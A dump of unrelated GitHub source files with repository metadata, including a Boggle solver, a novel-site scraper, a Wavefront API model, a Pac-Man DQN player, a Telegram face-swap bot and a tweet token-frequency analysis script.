weekday) VALUES (%s, %s, %s, %s, %s, %s, %s)
ON CONFLICT (start_time) DO NOTHING;
""")
# FIND SONGS
song_select = ("""
SELECT songs.song_id, artists.artist_id
FROM songs
JOIN artists ON songs.artist_id = artists.artist_id
WHERE songs.title = %s AND artists.name = %s AND songs.duration = %s
""")
# QUERY LISTS
create_table_queries = [user_table_create, song_table_create, artist_table_create, time_table_create, songplay_table_create]
drop_table_queries = [songplay_table_drop, user_table_drop, song_table_drop, artist_table_drop, time_table_drop]
|
[
"noreply@github.com"
] |
sgouda0412.noreply@github.com
|
cf81f7f02c8e5bd99840dcdbdcde1acf8539439e
|
4c7bec048e4e1a8676d83d73488eaf9a532d1be2
|
/stanCode_Projects/boggle_game_solver/boggle.py
|
ea43e60390faee5ae1a677ba663253270e29281d
|
[
"MIT"
] |
permissive
|
yutaotseng/sc-projects
|
32601b06fb16ae50784093f91898bf11a379daa5
|
67824242502a813e32f5c3a4bf04e0bafeded174
|
refs/heads/main
| 2023-04-22T07:46:29.291722
| 2021-05-03T23:58:28
| 2021-05-03T23:58:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,618
|
py
|
"""
File: boggle.py
Name:
----------------------------------------
TODO:
"""
# This is the file name of the dictionary txt file
# we will be checking if a word exists by searching through it
FILE = 'dictionary.txt'
# Global variables
DICTIONARY = {} # The dictionary that could be used to determine whether the word exist.
BOGGLE_DIC = {} # The dictionary that contains coordinate(key) and its corresponding letter(value).
ANS_LST = [] # The list that stores all the ans.
def main():
"""
TODO:
"""
read_dictionary()
enter_row()
boggle()
print(f'There are {len(ANS_LST)} words in total.')
def boggle():
for key in BOGGLE_DIC:
(x, y) = key
ans_coordinate = [(x, y)]
boggle_helper(x, y, BOGGLE_DIC[(x, y)], ans_coordinate)
def boggle_helper(x, y, ans, ans_coordinate):
for i in range(-1, 2, 1): # in order to find neighbor pixel
for j in range(-1, 2, 1): # in order to find neighbor pixel
if 0 <= x + i < 4:
if 0 <= y + j < 4:
if (x + i, y + j) not in ans_coordinate:
if ans in DICTIONARY and ans not in ANS_LST:
ANS_LST.append(ans)
print(f'Found: "{ans}"')
# Choose
ans_coordinate.append((x + i, y + j))
ans += BOGGLE_DIC[(x + i, y + j)]
# Explore
if has_prefix(ans):
boggle_helper(x + i, y + j, ans, ans_coordinate)
# Un-choose
ans_coordinate.pop()
ans = ans[:len(ans) - 1]
def enter_row():
global BOGGLE_DIC
letter_lst = []
while True:
if len(letter_lst) == 4:
break
else:
row = input(f'{len(letter_lst) + 1} row of letters: ')
row = row.lower()
row = row.split()
if row_letter_check(row):
letter_lst.append(row)
# Convert list into dictionary
for i in range(len(letter_lst)):
for j in range(len(letter_lst[i])):
BOGGLE_DIC[i, j] = letter_lst[i][j]
def row_letter_check(row):
if not len(row) == 4:
print('Illegal Format!!!')
return False
for letter in row:
if not letter.isalpha() or not len(letter) == 1:
print('Illegal Format!!!')
return False
return True
def read_dictionary():
"""
This function reads file "dictionary.txt" stored in FILE
and appends words in each line into a Python list
"""
with open(FILE, 'r') as f:
for line in f:
if len(line) > 4:
DICTIONARY[(line.strip())] = 1
return DICTIONARY
def has_prefix(sub_s):
"""
:param sub_s: (str) A substring that is constructed by neighboring letters on a 4x4 square grid
:return: (bool) If there is any words with prefix stored in sub_s
"""
for word in DICTIONARY:
if word.startswith(sub_s) is True:
return True
return False
if __name__ == '__main__':
main()
|
[
"noreply@github.com"
] |
yutaotseng.noreply@github.com
|
f9af3b9879359fec58bec1214e818391aa80651f
|
ca4a863486a63698af9d4e12f06680454564ebd4
|
/wen/novel/novel2.py
|
c4ddfdf5a69394f93b52a7d1ced0339db1ff65b8
|
[] |
no_license
|
yiliqsmy/pythonsrc
|
39874ecf9dce8d428477a19bf92cc8e42f2d035e
|
651166c5b5f8edb4910dcf8f52d2b311870151ae
|
refs/heads/master
| 2021-01-22T02:52:52.969355
| 2018-04-16T08:12:13
| 2018-04-16T08:12:13
| 102,255,896
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,822
|
py
|
#!python3
#coding=utf-8
#可用
#爬取小说--武侠乐园内容
#无章节名称
from bs4 import BeautifulSoup
import urllib.request
import re
import time
start =time.clock()
title=[] #小说名
href=[] #链接
#url = 'http://www.biquge.tw/26_26491/'
url = 'http://www.xs.la/153_153933/'
response = urllib.request.urlopen(url)
html_cont=response.read()
soup = BeautifulSoup(html_cont, 'html.parser', from_encoding='utf-8')
hrefAndname = soup.find("div", {"id":"list"}).findAll("a")
#for item in hrefAndname:
# href.append(item['href'])
for item in hrefAndname: #保存小说名和链接
if re.findall(re.compile(u"[\u4e00-\u9fa5]"),item.text):
# print item.text.encode('utf-8')
title.append(item.text)
href.append(item['href'])
wen = []
for i in range(len(href)):
try:
print ("爬取第"+str(i+1)+"章中……")
newurl = 'http://www.biquge.tw'+ href[i]
response = urllib.request.urlopen(newurl)
html_cont = response.read()
soup = BeautifulSoup(html_cont, 'html.parser', from_encoding='utf-8')
content = soup.find("div", {"id":"content"})
cont=str(content)
cont = re.sub(r'<\s*script[^>]*>[^<]*<\s*/\s*script\s*>','',cont)
cont = re.sub(r'</div>','',cont) #删除br标签
cont = re.sub(r'<div\s\S*>','',cont)
cont = re.sub(r'<br/>','\n',cont) #替换换行符
# f = open("E:/res/"+ str(i+1)+ ' .txt','w')
wen.append(cont)
# print(cont)
# print(wen)
except:
print ("错误, 爬取第"+str(i+1)+"章失败")
file_path=r"24.txt"
fp = open(file_path, "w", encoding='utf-8')
print(wen)
for item in wen:
fp.write(str(item) + "\n") #list中一项占一行
fp.close()
print ("成功")
end = time.clock()
print('运行: %s 秒'%(end-start))
|
[
"noreply@github.com"
] |
yiliqsmy.noreply@github.com
|
bebb9050c6ad3e53c38b82beaa8f92cc5565661d
|
d0d333c995766c35e10c8bcc8ecffdf167dad93c
|
/wavefront_api_client/models/access_control_list_write_dto.py
|
0350d2ca722b0a40379ab28b8a66a32c74ecf3de
|
[
"Apache-2.0"
] |
permissive
|
weisinchong-okta/python-client
|
283cc67e49a56f50e41ee6f6b1c9e5dae9b33cb0
|
c211f607f2182ed687e339a403d82408f08291b5
|
refs/heads/master
| 2022-12-20T18:02:42.704602
| 2020-09-17T15:16:20
| 2020-09-17T15:16:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,443
|
py
|
# coding: utf-8
"""
Wavefront REST API
<p>The Wavefront REST API enables you to interact with Wavefront servers using standard REST API tools. You can use the REST API to automate commonly executed operations such as automatically tagging sources.</p><p>When you make REST API calls outside the Wavefront REST API documentation you must add the header \"Authorization: Bearer <<API-TOKEN>>\" to your HTTP requests.</p> # noqa: E501
OpenAPI spec version: v2
Contact: chitimba@wavefront.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class AccessControlListWriteDTO(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'entity_id': 'str',
'modify_acl': 'list[str]',
'view_acl': 'list[str]'
}
attribute_map = {
'entity_id': 'entityId',
'modify_acl': 'modifyAcl',
'view_acl': 'viewAcl'
}
def __init__(self, entity_id=None, modify_acl=None, view_acl=None): # noqa: E501
"""AccessControlListWriteDTO - a model defined in Swagger""" # noqa: E501
self._entity_id = None
self._modify_acl = None
self._view_acl = None
self.discriminator = None
if entity_id is not None:
self.entity_id = entity_id
if modify_acl is not None:
self.modify_acl = modify_acl
if view_acl is not None:
self.view_acl = view_acl
@property
def entity_id(self):
"""Gets the entity_id of this AccessControlListWriteDTO. # noqa: E501
The entity Id # noqa: E501
:return: The entity_id of this AccessControlListWriteDTO. # noqa: E501
:rtype: str
"""
return self._entity_id
@entity_id.setter
def entity_id(self, entity_id):
"""Sets the entity_id of this AccessControlListWriteDTO.
The entity Id # noqa: E501
:param entity_id: The entity_id of this AccessControlListWriteDTO. # noqa: E501
:type: str
"""
self._entity_id = entity_id
@property
def modify_acl(self):
"""Gets the modify_acl of this AccessControlListWriteDTO. # noqa: E501
List of users and user groups ids that have modify permission # noqa: E501
:return: The modify_acl of this AccessControlListWriteDTO. # noqa: E501
:rtype: list[str]
"""
return self._modify_acl
@modify_acl.setter
def modify_acl(self, modify_acl):
"""Sets the modify_acl of this AccessControlListWriteDTO.
List of users and user groups ids that have modify permission # noqa: E501
:param modify_acl: The modify_acl of this AccessControlListWriteDTO. # noqa: E501
:type: list[str]
"""
self._modify_acl = modify_acl
@property
def view_acl(self):
"""Gets the view_acl of this AccessControlListWriteDTO. # noqa: E501
List of users and user group ids that have view permission # noqa: E501
:return: The view_acl of this AccessControlListWriteDTO. # noqa: E501
:rtype: list[str]
"""
return self._view_acl
@view_acl.setter
def view_acl(self, view_acl):
"""Sets the view_acl of this AccessControlListWriteDTO.
List of users and user group ids that have view permission # noqa: E501
:param view_acl: The view_acl of this AccessControlListWriteDTO. # noqa: E501
:type: list[str]
"""
self._view_acl = view_acl
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(AccessControlListWriteDTO, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AccessControlListWriteDTO):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"svc.wf-jenkins@vmware.com"
] |
svc.wf-jenkins@vmware.com
|
922885bccc22f2688984318bdc19be7a112e2453
|
c7e765a9bed33d3bfb21774e3995bf4a09e04add
|
/adminmgr/media/code/config/reducer.py
|
7ac6b3cdc07b7dc35ae5dc456f15d4c509e2e397
|
[
"Apache-2.0"
] |
permissive
|
IamMayankThakur/test-bigdata
|
13dd2ac7fb76c9baed6c3a0aa943057a22e2d237
|
7f507918c7bec31c92eedcd94491a83486623049
|
refs/heads/master
| 2022-05-03T00:59:44.127494
| 2022-02-10T19:50:16
| 2022-02-10T19:50:16
| 201,585,028
| 10
| 4
|
Apache-2.0
| 2022-04-22T23:39:45
| 2019-08-10T05:34:09
|
Python
|
UTF-8
|
Python
| false
| false
| 680
|
py
|
#!/usr/bin/python
import csv
from operator import itemgetter
import sys
global current_count = 0
global current_key = ""
for line in sys.stdin:
line = line.strip()
line_val = line.split("\t")
print(libe_val)
key, val = line_val[0], line_val[1]
try:
count = int(val)
except ValueError:
continue
current_key
current_count
if current_key == key:
current_count += count
else:
if (current_key != ""):
print('%s\t%s' % (current_key,str(current_count)))
current_count = 1
current_key = key
if current_key == key:
print '%s\t%s' % (current_key, current_count)
|
[
"ubuntu@ip-172-31-44-5.ec2.internal"
] |
ubuntu@ip-172-31-44-5.ec2.internal
|
156d7ffb716e8ce8cee4b9395a152b8fc5bbb914
|
82fce9aae9e855a73f4e92d750e6a8df2ef877a5
|
/Lab/venv/lib/python3.8/site-packages/OpenGL/EGL/KHR/platform_wayland.py
|
d385a0144d17f34fc2c79b6cca75b21e88003881
|
[] |
no_license
|
BartoszRudnik/GK
|
1294f7708902e867dacd7da591b9f2e741bfe9e5
|
6dc09184a3af07143b9729e42a6f62f13da50128
|
refs/heads/main
| 2023-02-20T19:02:12.408974
| 2021-01-22T10:51:14
| 2021-01-22T10:51:14
| 307,847,589
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 580
|
py
|
'''OpenGL extension KHR.platform_wayland
This module customises the behaviour of the
OpenGL.raw.EGL.KHR.platform_wayland to provide a more
Python-friendly API
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/KHR/platform_wayland.txt
'''
from OpenGL.raw.EGL.KHR.platform_wayland import _EXTENSION_NAME
def glInitPlatformWaylandKHR():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
|
[
"rudnik49@gmail.com"
] |
rudnik49@gmail.com
|
9a4949accaca75d37fe339320fedcbb5a7ca795e
|
d94938f9c2eff44eebac9dbfec806f2a997d7642
|
/ascii_art_generator.py
|
a312307b625b80b424c8adc2b673bdae4bc2f68e
|
[] |
no_license
|
skmhrk1209/AsciiArtGenerator
|
6ecfc4d8c6c7593e7a321eabcbffe79d98deec06
|
3e6f386eece6fa6b459e533775a635d432ad4a12
|
refs/heads/master
| 2020-03-30T17:18:35.606449
| 2018-10-03T21:23:47
| 2018-10-03T21:23:47
| 151,449,790
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,828
|
py
|
import numpy as np
import cv2
import sys
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--filename", type=str)
parser.add_argument('--width', type=int, default=100)
parser.add_argument("--height", type=int, default=100)
parser.add_argument('--exponent', type=float, default=2)
parser.add_argument('--stddev', type=float, default=0.1)
parser.add_argument('--invert', action="store_true")
args = parser.parse_args()
ascii_codes = [
"01!2\"3#4$5%6&7'8(9)-=^~\\",
"|qQwWeErRtTyYuUiIoOpP@`[",
"{aAsSdDfFgGhHjJkKlL;+:*]",
"}zZxXcCvVbBnNmMmM,<.>/?_",
"123456789012345678901234"
]
ascii_codes_image = cv2.imread("ascii_codes.png")
ascii_codes_image = cv2.cvtColor(ascii_codes_image, cv2.COLOR_BGR2GRAY)
ascii_codes_image = ascii_codes_image.astype(np.float32) / 255.0
h = ascii_codes_image.shape[0] // 5
w = ascii_codes_image.shape[1] // 24
brightnesses = sorted([
(ascii_codes[j][i], np.mean(ascii_codes_image[j * h: (j + 1) * h, i * w:(i + 1) * w]))
for j in range(5) for i in range(24)
], key=lambda item: item[1])
def linear_search(target_brightness):
for i, (_, brightness) in enumerate(brightnesses):
if brightness > target_brightness:
break
return brightnesses[int(np.clip(np.random.normal(loc=i, scale=args.stddev), 0, len(brightnesses) - 1))][0]
image = cv2.imread(args.filename)
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
image = cv2.bitwise_not(image) if args.invert else image
image = image.astype(np.float32) / 255.0
image = image ** args.exponent
h = image.shape[0] // args.height
w = image.shape[1] // args.width
ascii_art = ["".join([linear_search(np.mean(image[j * h: (j + 1) * h, i * w:(i + 1) * w]))
for i in range(args.width)]) for j in range(args.height)]
for line in ascii_art:
print(line)
|
[
"hirokisakuma@HirokinoMacBook-puro.local"
] |
hirokisakuma@HirokinoMacBook-puro.local
|
78cbd4ec39cc60e94d371042f90b02430a79308e
|
fc164822518577b909c8c2b7c4c679c7086b49a7
|
/esha_sketch/esha_sketch.pyde
|
fe38ab9d625ef8ed7d50572434d80cb23c9d6b5e
|
[
"MIT"
] |
permissive
|
alechapp/Processingcodes
|
383ff82524d9c29eebedc4bdcac2f98f328307e1
|
883c4b2b98382ff2772962b141beea0d2df0397b
|
refs/heads/master
| 2020-12-11T15:29:27.214183
| 2020-01-28T15:15:11
| 2020-01-28T15:15:11
| 233,885,520
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 651
|
pyde
|
delta = 5
x=450
y=450
def setup():
size(900,900)
background(128)
def draw():
global delta
global x, y
strokeWeight(5)
px = x
py = y
line(x,y,x,y)
if keyPressed :
if keyCode == UP :
y = y - delta
if keyCode == DOWN :
y = y + delta
if keyCode == LEFT :
x = x - delta
if keyCode == RIGHT :
x = x + delta
if x > 900 :
x = 900
if x < 0 :
x = 1
if y < 0 :
y = 1
if y > 900 :
y = 900
line(x, y, px, py)
if key == " " :
background(128)
|
[
"1935096@champlaincollege.qc.ca"
] |
1935096@champlaincollege.qc.ca
|
92a7c11b7cc70da8e097808ca9a4fc2975c90476
|
5e23ea6415d15121ce42f027e7f6b47b44f0dfc3
|
/ch05_plucker_test.py
|
8ecdd69df01582840c8c67e4970651bf6e63cd2d
|
[] |
no_license
|
openstake/hacking_rss_and_atom
|
e165419e8e3aee8ff71cc82ff50479b0a47fd335
|
a925c3bd9580c2d0463e4b645d2a84dec0109818
|
refs/heads/master
| 2021-01-16T19:04:12.635945
| 2008-11-02T01:41:18
| 2008-11-02T01:41:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 741
|
py
|
#!/usr/bin/env python
"""
ch05_plucker_test.py
Take the Plucker Distiller out for a test drive.
"""
import sys, time
import PyPlucker.Spider
HTML_FN = "http://www.decafbad.com"
PLUCKER_DIR = "."
PLUCKER_TITLE = "Sample Plucker Document"
PLUCKER_FN = "plucker-%s" % time.strftime("%Y%m%d-%H%M%S")
PLUCKER_BPP = 8
PLUCKER_DEPTH = 1
def main():
"""
Call the PLucker Distiller to output a test document.
"""
PyPlucker.Spider.realmain(None, argv=[
sys.argv[0],
'-P', PLUCKER_DIR,
'-f', PLUCKER_FN,
'-H', HTML_FN,
'-M', PLUCKER_DEPTH,
'-N', PLUCKER_TITLE,
'--bpp', PLUCKER_BPP,
'--title=%s' % PLUCKER_TITLE,
])
if __name__ == "__main__": main()
|
[
"l.m.orchard@pobox.com"
] |
l.m.orchard@pobox.com
|
175cfa7ed4443434932254d51d0798af3a098976
|
ce2df66c61ab634043ceeacc8678cd5fd94f2e77
|
/CS4701/DQN/play.py
|
a01f8e7fc55938d5afa89e051852a61547ac7a44
|
[] |
no_license
|
bayoumi17m/CS4701_Final_Proj
|
6ced6108866d71d1b16e52ce7bbc67ca5d665847
|
4c287f7866263373d45a6df9965ac8149c0cc3c1
|
refs/heads/master
| 2020-04-10T19:45:11.599289
| 2018-12-10T22:46:36
| 2018-12-10T22:46:36
| 161,245,961
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,606
|
py
|
import matplotlib
matplotlib.use("Agg")
from DQN import DuelingDQNPrioritizedReplay
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import gym
from gym.wrappers import Monitor
import warnings
import os
import time
def play(agent,env):
load_path = "./tmp/PRmem/model.ckpt"
agent.load(load_path)
obs = env.reset()
score = 0
steps = 0
done = False
index =[]
val = []
while done == False:
steps += 1
index.append(steps)
#action = agent.pick_action(obs)
obs, rewards, done, _ = env.step(env.action_space.sample())
val.append(rewards)
score += rewards
env.render()
time.sleep(0.1)
if __name__ == "__main__":
config = tf.ConfigProto()
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
config.gpu_options.allow_growth = True
sess = tf.Session(config= config)
env = gym.make('MsPacman-ram-v0')
MEMORY_SIZE = 5000
ACTION_SPACE = 9
OBSERVATION_SPACE = 128 # 210*160*3
EPISODES = 1
STEPS = 45000
IMAGE_WIDTH = 210
IMAGE_HEIGHT = 160
IMAGE_CHANNELS = 3
with tf.variable_scope('PRmem'):
prmem_DQN = DuelingDQNPrioritizedReplay(
n_actions=ACTION_SPACE, n_features=OBSERVATION_SPACE, memory_size=MEMORY_SIZE, epsilon=0,
epsilon_increment=0, sess=sess, dueling=False, output_graph=True,
prioritized=True,image_data=False,image_shape=(IMAGE_WIDTH,IMAGE_HEIGHT,IMAGE_CHANNELS))
print("Prioritized Replay DQN Built")
sess.run(tf.global_variables_initializer())
play(prmem_DQN,env)
|
[
"git"
] |
git
|
269d5c736ca6558cbb4c1639d58642d37ac50aa6
|
3ad49ad1106438bc7bd9e7872e3b1ca066c3bffa
|
/Demo_w3/Demo_w3.py
|
d044202fe8a49e07697c080368311cdd365fc5e9
|
[] |
no_license
|
Anvilondre/opencv-demos
|
606952be5b1211ec98fa07cc1537d986e7eb52c4
|
584b382a6d6102d69ca2d9e98957095cdd7f1794
|
refs/heads/master
| 2022-12-11T15:09:09.566455
| 2020-09-07T09:49:25
| 2020-09-07T09:49:25
| 286,213,902
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,136
|
py
|
import time
import cv2
import telebot
from itertools import cycle
from data.Token import token
from glob import glob
bot = telebot.TeleBot(token=token)
def write_counter():
global counter
with open('data/counter.txt', 'w') as w:
w.write(str(counter))
@bot.message_handler(content_types=['photo'])
def handle_image(message):
global counter, deep_face # Counter is just for naming purposes
counter += 1
write_counter()
raw = message.photo[-1].file_id
src_path = f'data/scr_imgs/{counter}.jpg'
res_path = f'data/res_imgs/{counter}.jpg'
# Downloading a received picture to process it with OpenCV
file_info = bot.get_file(raw)
downloaded_file = bot.download_file(file_info.file_path)
with open(src_path, 'wb') as new_file:
new_file.write(downloaded_file)
pic = deep_face.process_picture(src_path)
cv2.imwrite(res_path, pic) # Saving the result to send it back
with open(res_path, 'rb') as f:
bot.send_photo(message.chat.id, f)
def find_face_positions(img, classifier):
"""Finds all the faces on image and returns an array of (x, y, w, h) tuples."""
image_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
image_gray = cv2.equalizeHist(image_gray)
faces = classifier.detectMultiScale(image_gray)
return faces
class Face_Replacer:
def __init__(self, mask_images: iter):
# Initializing a built-in cascade classifier to detect faces
self.face_cascade = cv2.CascadeClassifier()
self.face_cascade.load(cv2.samples.findFile('data/haarcascades/haarcascade_frontalface_alt.xml'))
self.mask_images = mask_images
def overlay_image(self, background, x, y, w, h):
"""Scales foreground image to (w, h) size and adds it to the background image at (x, y) - top left corner."""
replacement = cv2.resize(next(self.mask_images), (w, h), cv2.INTER_CUBIC)
img = background.copy()
roi = img[y:y + h, x:x + w]
img2gray = cv2.cvtColor(replacement, cv2.COLOR_BGR2GRAY)
ret, mask = cv2.threshold(img2gray, 10, 255, cv2.THRESH_BINARY)
mask_inv = cv2.bitwise_not(mask)
img1_bg = cv2.bitwise_and(roi, roi, mask=mask_inv)
img2_fg = cv2.bitwise_and(replacement, replacement, mask=mask)
dst = cv2.add(img1_bg, img2_fg)
img[y: y + h, x:x + w] = dst
return img
def add_faces(self, img, faces):
"""Replaces all the faces if any found. Otherwise just adds a face in the bottom middle."""
res_img = img.copy()
if faces is None or len(faces) == 0:
w, h = res_img.shape[1] // 5, res_img.shape[0] // 3
x, y = res_img.shape[1] // 2 - w // 2, res_img.shape[0] - h
res_img = self.overlay_image(res_img, x, y, w, h)
for face in sorted(faces, key=lambda x: x[2] * x[3]):
face[2], face[3] = 0.9 * face[2], 1.1 * face[3]
face[0] += face[2] * 0.05
res_img = self.overlay_image(res_img, *face)
return res_img
def process_picture(self, file_name):
"""Connects everything together."""
# We need to make sure there are exactly 4 channels: BGR + Alpha
source_img = y if (y := cv2.imread(file_name, cv2.IMREAD_UNCHANGED)).shape[2] == 4 \
else cv2.cvtColor(y, cv2.COLOR_BGR2BGRA)
# Detect faces on image
faces = find_face_positions(source_img, self.face_cascade)
# Image with added/replaced faces
img = self.add_faces(source_img, faces)
return img
if __name__ == '__main__':
global counter, deep_face
# Creating an iterator for replacement faces
face_masks = cycle(cv2.imread(y, cv2.IMREAD_UNCHANGED) for y in glob('data/replacement_imgs/*.png'))
deep_face = Face_Replacer(face_masks)
with open('data/counter.txt', 'r') as r:
counter = int(r.read())
# If bot encounters some unpredictable stuff just wait some time and reload
while True:
try:
bot.polling()
except Exception:
print(f"Something went wrong! Image number: {counter}")
time.sleep(5)
|
[
"buracov.r@gmail.com"
] |
buracov.r@gmail.com
|
7483e278a896a2948b61ea14a2dc2de8518a7668
|
74cef976fc2550e9569249ed0453f9940848779f
|
/litedb/utils/io.py
|
342149be3fd108e119a403a27542d8c7d0e1bdac
|
[
"MIT"
] |
permissive
|
JonathanVusich/litedb
|
3c2383ddd4d332c84cb68d543f81702b20b10aa0
|
c750b9045c353b7f57dddb028410ec67f8b23a46
|
refs/heads/master
| 2021-06-29T17:23:49.730232
| 2020-10-24T20:07:08
| 2020-10-24T20:07:08
| 178,241,331
| 17
| 4
|
MIT
| 2020-10-24T20:07:09
| 2019-03-28T16:22:55
|
Python
|
UTF-8
|
Python
| false
| false
| 608
|
py
|
import os
import shutil
import stat
def _remove_readonly(func, path, _):
"""Clear the readonly bit and reattempt the removal."""
os.chmod(path, stat.S_IWRITE)
func(path)
def rmdir(directory):
"""Removes the given directory entirely."""
shutil.rmtree(directory, onerror=_remove_readonly)
def empty_directory(directory) -> None:
"""Removes the contents of a directory."""
with os.scandir(directory) as dir_contents:
for entry in dir_contents:
if entry.is_file():
os.unlink(entry)
if entry.is_dir():
rmdir(entry)
|
[
"31666175+JonathanVusich@users.noreply.github.com"
] |
31666175+JonathanVusich@users.noreply.github.com
|
ef0bb93629487c699f237c6e02ba5d17751c0818
|
b39b8e103fb07378dc267b50b2617319a5017c7d
|
/backend/4. TokenAnalysis/Main - TokenAnalysis.py
|
22bb49e9896cc6942d8b81b6c9bca50e73f100f0
|
[] |
no_license
|
mirkolai/mappa.controlodio.it
|
386995d7e9a150b2d91dddcb0a54616190803d99
|
751bc35810866c38714170df4693589cc5bf3c88
|
refs/heads/master
| 2023-06-29T21:01:24.471836
| 2021-07-29T15:03:46
| 2021-07-29T15:03:46
| 388,529,437
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,227
|
py
|
from nltk import word_tokenize
__author__ = 'mirko'
import pymysql
import traceback
import logging
import os,sys,inspect
import re
import nltk
nltk.download('stopwords')
#nltk.download('punkt')
from nltk.corpus import stopwords
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0,parentdir)
import config as cfg
db = pymysql.connect(host=cfg.mysql['host'],
user=cfg.mysql['user'],
passwd=cfg.mysql['passwd'],
db=cfg.mysql['db'],
charset='utf8mb4'#,
#use_unicode=True
)
cur = db.cursor()
cur.execute('SET NAMES utf8mb4')
cur.execute("SET CHARACTER SET utf8mb4")
cur.execute("SET character_set_connection=utf8mb4")
db.commit()
"""
Questo script si occupa di monitorare la frequenza gionaliera di word, hashtag e mention.
"""
#elimina token che nello storico sono poco significativi
cur.execute(" DELETE FROM daily_word_frequency "
" WHERE `count` <= 10")
db.commit()
#elimina token che nello storico sono poco significativi
cur.execute(" DELETE FROM daily_co_occurrence_word_frequency "
" WHERE `count` <= 10")
db.commit()
def extract_hashtags(text):
return re.findall("#(\w+)",text.lower())
def extract_mentions(text):
return re.findall("@(\w+)",text.lower())
def extract_words(text,stop_words,keywords):
text=re.sub(u"(https|http)?:\/\/(\w|\.|\/|\?|\=|\&|\%)*\b"," ",text)
text = re.sub(u"[^a-záàâåãäçèéêëìíîïñòóùúüÿßøæ#@]"," ",text)
filtered_sentence = []
for w in text.split(" "):
if w not in stop_words and len(w)>2 and len(w)<100:
flag = True
for keyword in keywords:
if "*" in keyword:
if re.findall(u""+keyword.replace("*", "") +"[haei]{1,2}", w.strip()):
flag = False
elif "#" in keyword:
if re.findall(u""+ keyword + "[rtaeio]{2}", w.strip()):
flag = False
elif re.findall(u""+ keyword +"", w.strip()):
flag = False
if flag:
filtered_sentence.append(w)
return filtered_sentence
cur.execute(" SELECT `id`, topic, `text`, `year`, `month`, `day`, `week_year`,"
" `administrative_division_0`, `administrative_division_1`,"
" `administrative_division_2` "
" from tweet_to_daily_token_frequency where `hs` is not NULL "
" order by year desc, month desc, day desc"
" limit 0,1000000 ")# AND `aggressiveness`is not NULL AND `offensiveness` is not NULL AND `stereotype` is not NULL AND `irony`is not NULL AND `intensity`is not NULL")
tweets=cur.fetchall()
stop_words = list(stopwords.words('italian'))+['https','http',"solo","senza","essere"]
for tweet in tweets:
#print(tweet[2].lower())
try:
id=tweet[0]
topic=tweet[1]
text=tweet[2].lower()
year=tweet[3]
month=tweet[4]
day=tweet[5]
"""
Un ciclo per ogni attributo: hs, aggressiveness etc..
"""
for attribute in cfg.attribute:
cur.execute(" SELECT "+attribute+" "
" from tweet_to_daily_token_frequency "
" where id=%s and topic=%s",(id,topic))
result=cur.fetchone()
label=result[-1]
#print(attribute,label,topic,text)
for h in extract_hashtags(text):
cur.execute("INSERT INTO "
"`daily_hashtag_frequency`(`token`, `topic`, `year`, `month`, `day`, `count_"+attribute+"_"+label+"`) "
" VALUES (%s,%s,%s,%s,%s,%s)"
" on duplicate key update `count` = `count`+1 , `count_"+attribute+"_"+label+"`=`count_"+attribute+"_"+label+"`+1",
(h,topic,year,month,day,1))
db.commit()
for m in extract_mentions(text):
cur.execute("INSERT INTO "
"`daily_mention_frequency`(`token`, `topic`, `year`, `month`, `day`, `count_" + attribute + "_" + label + "`) "
" VALUES (%s,%s,%s,%s,%s,%s)"
" on duplicate key update `count` = `count`+1 , `count_" + attribute + "_" + label + "`=`count_" + attribute + "_" + label + "`+1",
(m,topic,year,month,day,1))
db.commit()
for w in extract_words(text,stop_words,cfg.topic[topic]):
if w not in extract_hashtags(text) and w not in extract_mentions(text):
cur.execute("INSERT INTO "
"`daily_word_frequency`(`token`, `topic`, `year`, `month`, `day`, `count_" + attribute + "_" + label + "`) "
" VALUES (%s,%s,%s,%s,%s,%s)"
" on duplicate key update `count` = `count`+1 , `count_" + attribute + "_" + label + "`=`count_" + attribute + "_" + label + "`+1",
(w,topic,year,month,day,1))
db.commit()
words = extract_words(text, stop_words, cfg.topic[topic])
for i in range(0,len(words)):
for j in range(i,len(words)):
if i != j:
first = words[j] if words[j] < words[i] else words[i]
second = words[j] if words[i] < words[j] else words[i]
cur.execute(" INSERT INTO "
" `daily_co_occurrence_word_frequency` "
" (`token_1`,`token_2`, `topic`, `year`, `month`, `day`, `count_" + attribute + "_" + label + "`) "
